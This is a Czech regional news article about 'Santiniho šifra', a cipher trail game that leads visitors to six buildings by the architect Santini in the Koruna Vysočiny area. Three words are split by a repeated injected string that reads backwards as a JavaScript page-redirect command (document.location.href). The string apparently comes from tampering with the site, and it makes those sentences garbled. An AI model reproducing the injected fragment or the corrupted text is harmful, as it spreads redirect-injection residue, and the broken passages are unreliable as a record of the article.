Rainbow page separator

Santiniho šifra odhalí magická místa Koruny Vysočiny

Pondělí, 27. června 2022

Žďársko / Seznámit se s dílem architekta Jana Blažeje Santiniho Aichla mají nyní lidé možnost prostřednictvím pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování nazvaného Santiniho šifra, které připravila destinační společností Koruna Vysočiny. Tištěný plánek je od 24. června k dostání v turistických informačních centrech v Bystřici nad Pernštejnem, Novém Městě na Moravě, Nedvědici, Žďáře nad Sázavou, zámku Žďár, Sněžném, Šiklandu a také v pokladně poutního kostela svatého Jana Nepomuckého na žďárské Zelené hoře.
Hra Santiniho šifra seznamuje návštěvníky se šesti místy v regionu, která jsou s význačným architektem spojena. Kromě nejznámějšího z nich, kterým je poutní kostel na Zelené hoře ve Žďáře, památka UNESCO, jde ještě o kostel svatého Václava ve Zvoli, barokně přestavěný kostel v Bobrové, jenž poutá pozornost opačnou orientací kostelní věže, než je obvyklé, či obyč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovský kostel s půdorysem želvy. V Ostrově nad Oslavou se zase nachází zájezdní hostinec ve tvaru písmene W a klášter cisterciaček přestavěný na zámek a areál poutního místa Svatá Anna čeká luštitele šifry v Pohledu na Havlíčskobrodsku.
Hra cílí na malé i velké a operuje se symboly, tvary, písmeny, čísly či šiframi ukrývajícími se v šesti zmíněných stavbách. „Fasády kostelů, kamenné sochy nebo lesní zátiší pomohou k vyluštění 27 úkolů a na jejich konci se skrývá vzkaz Santiniho šifry,“ přiblížil au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor nápadu, kterým je žďárský učitel Jiří Dokulil.
Poznávat region i památky a procvičovat své mozkové závity se dá různě. „Trasa šifry umožňuje pohyb na kole, pěšky, veřejnou dopravou nebo autem. Zúčastnit se může jak jednotlivec, tak skupina. Úspěšní luštitelé vymění řešení šifry s průvodcem v kostele na Zelené hoře, případně v informačním centru ve žďárském zámku za drobnou odměnu,“ doplnil ředitel Koruny Vysočiny David Štěpánek.